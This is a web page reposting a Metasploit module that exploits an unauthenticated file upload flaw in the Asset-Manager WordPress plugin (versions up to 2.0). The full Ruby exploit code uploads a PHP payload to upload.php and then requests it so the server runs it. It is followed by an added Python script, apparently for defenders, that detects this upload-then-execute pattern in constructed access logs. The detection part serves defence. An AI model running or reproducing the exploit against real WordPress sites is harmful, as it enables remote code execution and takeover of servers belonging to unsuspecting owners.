WordPress Asset-Manager PHP File Upload Vulnerability

Posted on 2012-12-31 09:22:33
This Metasploit module exploits a vulnerability found in the Asset-Manager WordPress plugin, version 2.0 and below. The plugin allows PHP files to be uploaded: a user can upload a file into a temporary directory without any authentication, which results in arbitrary code execution.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"
    payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Build the multipart/form-data body that the plugin's upload.php expects
    # (the file is sent in the "Filedata" field).
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data
    })

    # upload.php echoes the stored file name back on success
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # Request the uploaded file from the temp directory so the web server runs it
    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method'  => 'GET'
    })

    if res and res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end
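The two requests the module makes (an unauthenticated POST to the plugin's upload.php, then a GET for the freshly dropped .php file under wp-content/uploads/assets/temp/) leave a distinctive pair of entries in the web server access log. The following detection script is an added example for defenders, not part of the original post or of the Metasploit module; the log lines are constructed, and the paths assume a WordPress install under /wordpress, matching the module's default TARGETURI.

```python
import re

# Constructed sample lines in Apache combined log format (not taken from the page).
SAMPLE_LOG = """\
203.0.113.7 - - [31/Dec/2012:09:20:01 +0000] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [31/Dec/2012:09:20:02 +0000] "GET /wordpress/wp-content/uploads/assets/temp/abcde.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
198.51.100.4 - - [31/Dec/2012:09:21:10 +0000] "GET /wordpress/wp-content/uploads/assets/temp/logo.png HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
198.51.100.9 - - [31/Dec/2012:09:22:33 +0000] "GET /wordpress/wp-login.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, timestamp, method, path and status are enough here.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
UPLOAD_ENDPOINT = "/wp-content/plugins/asset-manager/upload.php"   # unauthenticated upload handler
TEMP_DIR = "/wp-content/uploads/assets/temp/"                      # where uploads land
SCRIPT_EXTS = (".php", ".phtml", ".php5")


def parse_line(line):
    """Return a dict of fields for one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def detect(log_text):
    """Scan access-log text and return (severity, client_ip, path) findings.

    low:    any POST to the Asset-Manager upload.php (audit every upload, it needs no login)
    medium: a request for a script file under the plugin's temp upload directory
    high:   the same, from an IP that already got a 200 from upload.php (upload-then-execute)
    """
    findings = []
    uploaders = set()  # IPs whose POST to upload.php was answered with 200
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        path = rec["path"].split("?", 1)[0]
        if rec["method"] == "POST" and path.endswith(UPLOAD_ENDPOINT):
            findings.append(("low", rec["ip"], path))
            if rec["status"] == "200":
                uploaders.add(rec["ip"])
        elif TEMP_DIR in path and path.lower().endswith(SCRIPT_EXTS):
            severity = "high" if rec["ip"] in uploaders else "medium"
            findings.append((severity, rec["ip"], path))
    return findings
```

A .php request under the temp directory should never occur in normal use of the plugin, so the medium finding is worth alerting on even without the preceding POST from the same client.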